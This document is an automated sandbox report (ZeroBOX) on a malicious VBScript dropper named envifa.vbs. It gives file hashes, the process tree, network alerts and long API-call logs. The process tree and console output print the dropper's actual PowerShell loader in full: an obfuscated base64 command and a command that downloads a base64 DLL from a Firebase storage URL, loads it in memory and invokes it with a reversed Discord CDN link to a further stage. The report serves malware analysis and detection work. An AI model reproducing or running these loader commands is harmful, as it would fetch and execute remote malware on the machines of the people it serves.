Summary | ZeroBOX

envifa.vbs

Generic Malware Antivirus Hide_URL PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 9, 2024, 10:45 a.m. Aug. 9, 2024, 10:47 a.m.
Size 11.3MB
Type Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5 23cef0c9c3e02cc2bdc8516b889d1191
SHA256 16b1375e4fb1306be8f8952f0469b86eb570718c8e4a2b8633809c8e1967ebee
CRC32 CB89179F
ssdeep 1536:BPDVP1P4PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPZ:pU
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\envifa.vbs

    3044
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( 
$ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\envifa.vbs');powershell -command $KByHL;

      2196
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\envifa.vbs';[Byte[]] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($fpmxy).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb0040b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080ivne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' ));"

        2344

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49165 -> 142.250.196.234:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49165
142.250.196.234:443
C=US, O=Google Trust Services, CN=WR2 CN=upload.video.google.com c4:3f:12:39:d2:ec:4c:2c:1c:0a:a6:18:8e:2a:97:2c:d8:c2:7e:af

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "DownloadString" with "1" argument(s): "The remote server ret
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: urned an error: (400) Bad Request."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:166
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\envifa.vbs';[Byte[]
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: ] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).Downl
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: oadString <<<< ('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.app
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: spot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-0411345
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: 77ffe'));[system.AppDomain]::CurrentDomain.Load($fpmxy).GetType('ClassLibrary3.
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb00
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: 40b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080iv
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: ne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:spt
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: th' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' )
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: Multiple ambiguous overloads found for "Load" and the argument count: "1".
console_handle: 0x000000eb
1 1 0

WriteConsoleW

buffer: At line:1 char:356
console_handle: 0x000000f7
1 1 0

WriteConsoleW

buffer: + $knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\envifa.vbs';[Byte[]
console_handle: 0x00000103
1 1 0

WriteConsoleW

buffer: ] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).Downl
console_handle: 0x0000010f
1 1 0

WriteConsoleW

buffer: oadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.c
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: om/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: ));[system.AppDomain]::CurrentDomain.Load <<<< ($fpmxy).GetType('ClassLibrary3.
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb00
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: 40b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080iv
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: ne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:spt
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: th' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' )
console_handle: 0x00000163
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodException
console_handle: 0x0000017b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : MethodCountCouldNotFindBest
console_handle: 0x00000187
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452790
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004524d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004524d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004524d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004520d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004520d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004520d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004520d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004520d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004520d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00451bd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00451bd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00451bd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452290
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004526d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00452590
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00451d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00451d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00595680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00595d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00595d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00595d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005957c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005957c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005957c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005957c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005957c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005957c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header
suspicious_request GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll/dll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe
request GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll/dll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02940000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0223a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02232000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02282000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02283000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02284000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0223b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02722000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02285000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02bb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02286000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02723000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02724000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02725000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02726000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02727000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02728000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02729000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
